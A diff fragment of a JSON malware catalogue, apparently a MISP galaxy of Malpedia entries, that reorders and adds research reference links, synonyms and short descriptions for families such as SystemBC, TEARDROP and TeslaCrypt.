- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://news.sophos.com/en-us/2020/12/16/systembc/",
"https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
- "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
"https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
"https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
"https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
"https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
"https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://news.sophos.com/en-us/2020/12/16/systembc/",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a"
],
"synonyms": [
"Coroxy"
@@ -44150,10 +46507,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
"https://www.secureworks.com/research/srizbi",
"https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
- "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel"
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [],
"type": []
@@ -44171,15 +46528,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d5a4cbe7-81c9-4a52-80ee-07ca3f625844",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145",
"value": "TabMsgSQL"
},
@@ -44188,15 +46536,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
- "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
"https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat",
- "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
"http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1"
],
"synonyms": [
@@ -44204,15 +46552,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "cda7d605-23d0-4f93-a585-1276f094c04a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "94323b32-9566-450b-8480-5f9f53b57948",
"value": "taidoor"
},
@@ -44235,8 +46574,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret",
- "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html",
- "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html"
+ "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
+ "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html"
],
"synonyms": [],
"type": []
@@ -44265,15 +46604,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "b7b4c682-090b-4da2-abc2-541fd3157579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410",
"value": "Tapaoux"
},
@@ -44282,12 +46612,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany",
- "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
"https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/",
+ "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
+ "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html",
+ "https://www.sangfor.com/blog/cybersecurity/new-threat-mallox-ransomware",
"https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html",
- "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html"
+ "https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/",
+ "https://asec.ahnlab.com/en/39152/"
],
"synonyms": [
+ "Fargo",
+ "Mallox",
"Tohnichi"
],
"type": []
@@ -44313,12 +46648,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer",
- "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.minerva-labs.com/taurus-stealers-evolution",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/",
"https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
"https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
- "https://blog.minerva-labs.com/taurus-stealers-evolution"
+ "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
],
"synonyms": [],
"type": []
@@ -44342,13 +46678,14 @@
"value": "TClient"
},
{
- "description": "",
+ "description": "F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer",
+ "https://securityintelligence.com/hammertoss-what-me-worry/",
"https://www.youtube.com/watch?v=UE9suwyuic8",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf",
- "https://securityintelligence.com/hammertoss-what-me-worry/"
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf"
],
"synonyms": [
"HAMMERTOSS",
@@ -44393,9 +46730,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy",
"https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
- "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent",
+ "https://www.deepinstinct.com/blog/the-russian-spyagent-a-decade-later-and-rat-tools-remain-at-risk",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging",
"https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging"
+ "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent"
],
"synonyms": [
"TVRAT",
@@ -44412,51 +46750,42 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
"https://www.brighttalk.com/webcast/7451/462719",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://github.com/fireeye/sunburst_countermeasures",
"https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
- "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://twitter.com/TheEnergyStory/status/1346096298311741440",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b",
"https://twitter.com/craiu/status/1339954817247158272",
"https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
- "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
- "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
"https://www.youtube.com/watch?v=LA-XE5Jy2kU",
"https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
"https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://twitter.com/TheEnergyStory/status/1346096298311741440",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
"https://twitter.com/TheEnergyStory/status/1342041055563313152",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b"
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
+ "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "aba3fd7d-87cc-4266-82a1-d458ae299266",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "efa01fef-7faf-4bb2-8630-b3a237df882a",
"value": "TEARDROP"
},
@@ -44504,11 +46833,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine",
- "https://www.secureworks.com/research/threat-profiles/iron-viking"
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks"
],
"synonyms": [],
"type": []
@@ -44521,9 +46850,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor",
- "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"
+ "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
],
"synonyms": [],
"type": []
@@ -44544,13 +46873,39 @@
"uuid": "48352761-a92f-43b4-931d-249ac9eae8b2",
"value": "TelegramGrabber"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telemiris",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f39400a3-3b27-4dc6-bccd-aa277ca99f28",
+ "value": "Telemiris"
+ },
+ {
+ "description": "Cisco Talos reports that this is a data exfiltration tool used by TA505.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b6a2a1ea-6cdb-4cbd-a9a6-539c7db1c6de",
+ "value": "Teleport"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/"
+ "https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks"
],
"synonyms": [],
"type": []
@@ -44570,15 +46925,28 @@
"uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
"value": "Tempedreve"
},
+ {
+ "description": "According to Cyble, this is a stealer targeting several crypto currency wallets along browser data.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer",
+ "https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a27b7e55-6036-4c4a-96b2-0a99df878fe0",
+ "value": "TempStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat",
- "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
- "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
"https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
+ "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
+ "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf"
],
"synonyms": [
"Fakem RAT"
@@ -44593,9 +46961,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.termite",
- "https://www.alienvault.com/blogs/labs-research/internet-of-termites",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
"https://www.mandiant.com/resources/evolution-of-fin7",
- "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/"
+ "https://www.alienvault.com/blogs/labs-research/internet-of-termites"
],
"synonyms": [],
"type": []
@@ -44608,6 +46976,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
"https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
],
"synonyms": [],
@@ -44622,8 +46992,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader",
"https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-"
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [],
"type": []
@@ -44652,12 +47025,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://twitter.com/3xp0rtblog/status/1275746149719252992",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
"https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://twitter.com/3xp0rtblog/status/1275746149719252992",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [
"SONE",
@@ -44674,10 +47047,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
"https://blog.minerva-labs.com/taurus-user-guided-infection",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
],
"synonyms": [
"Taurus Loader TeamViewer Module"
@@ -44692,17 +47065,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt",
- "https://community.riskiq.com/article/30f22a00",
- "https://blogs.cisco.com/security/talos/teslacrypt",
- "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
- "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/",
- "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
"https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/",
+ "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla",
"https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/",
- "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack",
- "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/",
+ "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/",
+ "https://blogs.cisco.com/security/talos/teslacrypt",
+ "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/",
+ "https://community.riskiq.com/article/30f22a00",
"https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/"
+ "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf",
+ "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack"
],
"synonyms": [
"cryptesla"
@@ -44717,8 +47090,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower",
- "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign",
"https://www.sygnia.co/mata-framework",
+ "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign",
"https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/"
],
"synonyms": [],
@@ -44747,8 +47120,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom",
- "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/",
"https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html",
+ "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/",
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/"
],
"synonyms": [],
@@ -44801,15 +47174,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
"https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/",
"https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps",
"https://www.ic3.gov/Media/News/2021/211026.pdf",
"https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
"https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps"
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/"
],
"synonyms": [
"Ranzy Locker"
@@ -44836,9 +47209,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf",
"https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
+ "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs",
+ "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf"
],
"synonyms": [],
"type": []
